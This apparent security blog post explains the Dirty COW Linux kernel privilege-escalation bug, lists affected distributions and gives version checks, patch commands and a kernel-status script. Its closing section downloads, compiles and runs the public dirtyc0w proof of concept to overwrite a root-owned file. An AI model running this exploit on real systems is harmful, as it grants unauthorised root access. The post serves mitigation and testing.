Overview
Dirty COW is a new high-profile privilege escalation vulnerability in Linux, the latest in a series of branded bugs such as Heartbleed, Ghost and ShellShock. In this post I’ll give more details about this vulnerability and how to mitigate the risk to your systems.
Present in Linux kernel versions 2.6.22 and higher, the issue has existed since 2007. After its discovery by a security researcher named Phil Oester, it was fixed on Oct 18, 2016, which means that there’s a high probability that your devices running Linux are vulnerable.
Description
The description from Red Hat’s CVE:
“A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.”
First, an attacker gains access to the machine. Second, the attacker runs a publicly available exploit (several exist). A successful attack gives the attacker root privileges. The attack is not logged and will therefore pass undetected.
Patches are available for most Linux distros.
Vulnerable Linux distros (Common):
Your first concern should be to mitigate the bug on your servers, which probably have the most users and application packages. But you should also attend to network appliances and less common Linux distros such as CoreOS.
- Red Hat Enterprise Linux 7.x
- Red Hat Enterprise Linux 6.x
- Red Hat Enterprise Linux 5.x
- CentOS Linux 7.x
- CentOS Linux 6.x
- CentOS Linux 5.x
- Debian Linux wheezy
- Debian Linux jessie
- Debian Linux stretch
- Debian Linux sid
- Ubuntu Linux precise (LTS 12.04)
- Ubuntu Linux trusty
- Ubuntu Linux xenial (LTS 16.04)
- Ubuntu Linux yakkety
- Ubuntu Linux vivid/ubuntu-core
- SUSE Linux Enterprise 11 and 12
- Amazon Linux AMI
Testing for a vulnerable kernel
Run the following command according to your distro:
$ uname -a
$ uname -mrs
Sample output:
Linux 3.13.0-95-generic x86_64
Fixing the issue
- Debian or Ubuntu Linux
$ sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade
$ sudo reboot
- RHEL / CentOS Linux 5.x/6.x/7.x
Red Hat is releasing patches for the various versions gradually, without giving a deadline.
For up-to-date information, refer to: https://access.redhat.com/security/vulnerabilities/2706661.
$ sudo yum update
$ sudo reboot
- SUSE Enterprise Linux or openSUSE Linux
To apply all needed patches to the system type:
# zypper patch
# reboot
- Amazon Linux AMI
The patched kernel’s version is: “kernel-4.4.23-31.54.amzn1.x86_64”.
To update the kernel:
# sudo yum update kernel
# reboot
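The version check and the reboot steps above combine into one test: an updated kernel package protects nothing until the host has booted into it. The script below is an added example, not part of the original post; the function names, the use of /boot/vmlinuz-* images and GNU sort -V are assumptions, and only the Amazon Linux version string comes from the post.

```shell
#!/bin/sh
# Added example: is the kernel that is *running* the newest one installed?
# Release strings used with it are constructed samples, except AMZN_FIXED,
# which is the patched Amazon Linux AMI version quoted in this post.
AMZN_FIXED="4.4.23-31.54.amzn1.x86_64"

# ver_lt A B: succeed when A sorts strictly before B (GNU `sort -V`, which
# approximates but is not identical to rpm/dpkg version ordering).
ver_lt() {
    [ "$1" != "$2" ] &&
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# newest_installed DIR: highest kernel release among DIR/vmlinuz-* images.
newest_installed() {
    for img in "$1"/vmlinuz-*; do
        if [ -e "$img" ]; then printf '%s\n' "${img##*/vmlinuz-}"; fi
    done | sort -V | tail -n 1
}

# kernel_state RUNNING [BOOTDIR]: prints one of
#   reboot-pending   a newer kernel image is installed but not running
#   amzn-vulnerable  Amazon Linux kernel older than AMZN_FIXED
#   amzn-patched     Amazon Linux kernel at or above AMZN_FIXED
#   check-advisory   no fixed version known here; compare with the vendor advisory
kernel_state() {
    running=$1
    newest=$(newest_installed "${2:-/boot}")
    if [ -n "$newest" ] && ver_lt "$running" "$newest"; then
        echo reboot-pending
        return
    fi
    case $running in
        *.amzn1.*)
            if ver_lt "$running" "$AMZN_FIXED"; then echo amzn-vulnerable
            else echo amzn-patched; fi ;;
        *) echo check-advisory ;;
    esac
}

# Usage on a live host: kernel_state "$(uname -r)"
```

The check compares release strings only, so a distro that ships a fix without changing the release string still reports check-advisory and the package version has to be compared with the vendor advisory.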
Proof of Concept exploit
The PoC helps you determine whether a less common Linux distro is vulnerable or patched:
- Download:
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
- Create a target file as root:
$ sudo -s
# echo this is not a test > foo
- Run the PoC as a normal user:
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
Editor’s note:
I updated the post to include Amazon Linux AMI and the latest info from Red Hat.